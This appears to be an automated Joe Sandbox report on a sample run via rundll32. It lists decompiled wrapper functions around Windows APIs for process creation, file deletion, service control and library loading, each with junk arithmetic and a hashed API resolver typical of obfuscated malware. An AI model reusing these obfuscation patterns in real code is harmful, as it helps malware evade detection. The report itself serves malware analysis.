Function 001B4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001B4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001C07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x001b485e
0x001b487a
0x001b487d
0x001b4884
0x001b488b
0x001b4892
0x001b489d
0x001b48a0
0x001b48ad
0x001b48b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 001B48B7

Strings

[, xrefs: 001B488B

Memory Dump Source

Source File: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000C.00000002.2095934659.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2095986023.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 00904b64e157f3b053c7fc5c284fe6015112767b80c40a4adc05144c8812648e
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: D7F017B0A05309FBDB08CFE8CA56A9EBFB9EB40301F20818CE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001C4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E001C4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001C07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x001c4f80
0x001c4f81
0x001c4f82
0x001c4f86
0x001c4f87
0x001c4f8c
0x001c4fa5
0x001c4fa8
0x001c4faf
0x001c4fb6
0x001c4fc7
0x001c4fca
0x001c4fd7
0x001c4fe2
0x001c4fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 001C4FE2

Strings

{#lm, xrefs: 001C4FC2

Memory Dump Source

Source File: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000C.00000002.2095934659.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2095986023.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: f8de56d074b08df0fb15d029ed067210aaec12f1cc8b3bae4c83b15ebcb1d7b8
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: F5F037B081120CFFDB08EFA4D94289EBFBAEB54300F20819DE804AB250D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001C976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E001C976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001B602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001C07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x001c9772
0x001c9773
0x001c9778
0x001c977a
0x001c977b
0x001c977e
0x001c977f
0x001c9782
0x001c9785
0x001c9788
0x001c9789
0x001c978c
0x001c978f
0x001c9790
0x001c9791
0x001c9794
0x001c9797
0x001c979a
0x001c979d
0x001c97a0
0x001c97a3
0x001c97a6
0x001c97a7
0x001c97a8
0x001c97ad
0x001c97b7
0x001c97c3
0x001c97ca
0x001c97d1
0x001c97d8
0x001c97df
0x001c97e3
0x001c97fc
0x001c9816
0x001c981d

APIs

CreateProcessW.KERNEL32(001B591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001B591A), ref: 001C9816

Memory Dump Source

Source File: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000C.00000002.2095934659.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2095986023.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 814181e527a123c9a8c8c1a76b9dd5d193f68a882cb2efb8b2734a66dab9dca6
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 6411B372901148FBDF1A9FD6DC0ACDF7F7AEF99750F104148FA1556120D2768A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001BB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E001BB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001B602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001C07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x001bb569
0x001bb56a
0x001bb56d
0x001bb572
0x001bb574
0x001bb577
0x001bb57a
0x001bb57d
0x001bb580
0x001bb583
0x001bb586
0x001bb587
0x001bb58a
0x001bb58d
0x001bb590
0x001bb593
0x001bb594
0x001bb595
0x001bb59a
0x001bb5a4
0x001bb5b8
0x001bb5c0
0x001bb5c4
0x001bb5cb
0x001bb5d2
0x001bb5d9
0x001bb5e6
0x001bb5fd
0x001bb604

APIs

CreateFileW.KERNELBASE(001C0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001C0668,?,?,?,?), ref: 001BB5FD

Memory Dump Source

Source File: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000C.00000002.2095934659.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2095986023.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 6725fcf7fbb50ce5bd6aab8df551017077bf3fc56c41ae3334ad3b925e957fcd
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: F611BF72801248BBDF16DF95DD06CEE7FBAEF99314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 001C981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E001C981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001B602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001C07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x001c9821
0x001c9822
0x001c9825
0x001c9828
0x001c982a
0x001c982c
0x001c982f
0x001c9832
0x001c9835
0x001c9836
0x001c9837
0x001c983c
0x001c9855
0x001c9858
0x001c985f
0x001c9866
0x001c986d
0x001c9874
0x001c987b
0x001c988e
0x001c989b
0x001c98a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001B87F2,0000CAAE,0000510C,AD82F196), ref: 001C989B

Memory Dump Source

Source File: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000C.00000002.2095934659.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2095986023.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 91343e7afc06622a3fa6959c9da9b115f1d129389da1fba3ab650883ec2038cc
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: CC018872801208FBDB08EFD5D846CDFBF79EF95310F10818CF908A6220E6719A619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C7BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001C7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001C07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x001c7bf7
0x001c7bf8
0x001c7bfa
0x001c7bfd
0x001c7bff
0x001c7c02
0x001c7c06
0x001c7c07
0x001c7c0f
0x001c7c1d
0x001c7c25
0x001c7c2d
0x001c7c31
0x001c7c38
0x001c7c3f
0x001c7c46
0x001c7c4a
0x001c7c5e
0x001c7c67
0x001c7c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001C7C67

Memory Dump Source

Source File: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000C.00000002.2095934659.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2095986023.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 6caadd193399ce78e7f5a8cc4e138f1ea36a306b792c23a7f040c1bb7b532d4c
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: B7014BB190120CFFEB09DFA4C84A9DEBBB9EF54314F208198F405A7240EBB19F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 001BF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E001BF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001C07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x001bf662
0x001bf663
0x001bf665
0x001bf668
0x001bf66a
0x001bf66d
0x001bf670
0x001bf673
0x001bf677
0x001bf678
0x001bf67d
0x001bf687
0x001bf693
0x001bf69a
0x001bf6a1
0x001bf6a5
0x001bf6a9
0x001bf6b0
0x001bf6c9
0x001bf6d8
0x001bf6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001BF6D8

Memory Dump Source

Source File: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000C.00000002.2095934659.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2095986023.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 0aa635a33969d0bb15146abc9de0b9e751b2c0cdb7da03f56719894e13192673
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 2901E5B6901208BBEF05AF94DC068DF7F75EB15324F148188F90462250D7B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001BB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001BB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001B602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001C07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x001bb6f3
0x001bb6f8
0x001bb702
0x001bb70b
0x001bb712
0x001bb719
0x001bb720
0x001bb727
0x001bb72e
0x001bb747
0x001bb759
0x001bb75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001BB759

Memory Dump Source

Source File: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000C.00000002.2095934659.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2095986023.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 92b3a87ebfcb90482349c4c08848fb740351d06fc1b64c4268234279f969f6d6
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 9E0128B6941308FBEB45DF94DD06E9E7BB5EB18704F108188FA09661A0D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 001CAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001CAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001C07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x001caa3f
0x001caa40
0x001caa41
0x001caa44
0x001caa47
0x001caa4b
0x001caa4c
0x001caa51
0x001caa5b
0x001caa64
0x001caa68
0x001caa6f
0x001caa76
0x001caa8d
0x001caa90
0x001caa9d
0x001caaa8
0x001caaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001CAAA8

Memory Dump Source

Source File: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000C.00000002.2095934659.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2095986023.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 033fe6d405475f3929599029d466b4aa154e068d6064d85cd0ac8b976b3bca9e
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 30F069B190020CFFDF08EF94DD4A99EBFB4EB54304F10808CF805A6250D3B69B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 001B5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001B5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001C07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x001b5fb5
0x001b5fb6
0x001b5fb7
0x001b5fbb
0x001b5fbc
0x001b5fc1
0x001b5fcb
0x001b5fd7
0x001b5fde
0x001b5fe5
0x001b5ffc
0x001b5fff
0x001b6006
0x001b600d
0x001b601a
0x001b6025
0x001b602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 001B6025

Memory Dump Source

Source File: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000C.00000002.2095934659.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2095986023.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 33aca1f4dfae311a7e4b0805b1e5eafa30bce6370b8de9c4ff09beaaa06defa9
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 6AF03CB0811208FFDB08DFA0E94689EBFB8EB50300F20819CE409A7260E7719F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2408 Parent PID: 2444 rundll32.exeCOMMON

Executed Functions

Function 001C2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E001C2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001C602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001D07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001C29DC

Strings

<^, xrefs: 001C2977

Memory Dump Source

Source File: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000D.00000002.2097386282.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2097431813.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 585c5f251f195fe6e8e59c95342b492ebd3021f79e3b4d7f0a61d1e858bb25d7
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: F2018072A00108BFEB14DF95DC0A9DFBFB6EF48310F108089F508A6250D7B69F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 001CC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E001CC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001C602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001D07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x001cc6e1
0x001cc6e6
0x001cc6f0
0x001cc6fc
0x001cc703
0x001cc706
0x001cc70d
0x001cc711
0x001cc715
0x001cc71c
0x001cc723
0x001cc72a
0x001cc731
0x001cc738
0x001cc751
0x001cc762
0x001cc768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001CC762

Strings

/O, xrefs: 001CC6E6

Memory Dump Source

Source File: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000D.00000002.2097386282.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2097431813.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 1fbc908036176254d588e21bf3f1c3b34a866dd59970685687b245006454ceeb
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 341133B290122DBBCB25DF94DC498DFBFB8EF14714F108188F90966210D3B14B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001C1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E001C1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001C602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001D07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 001C1096

Strings
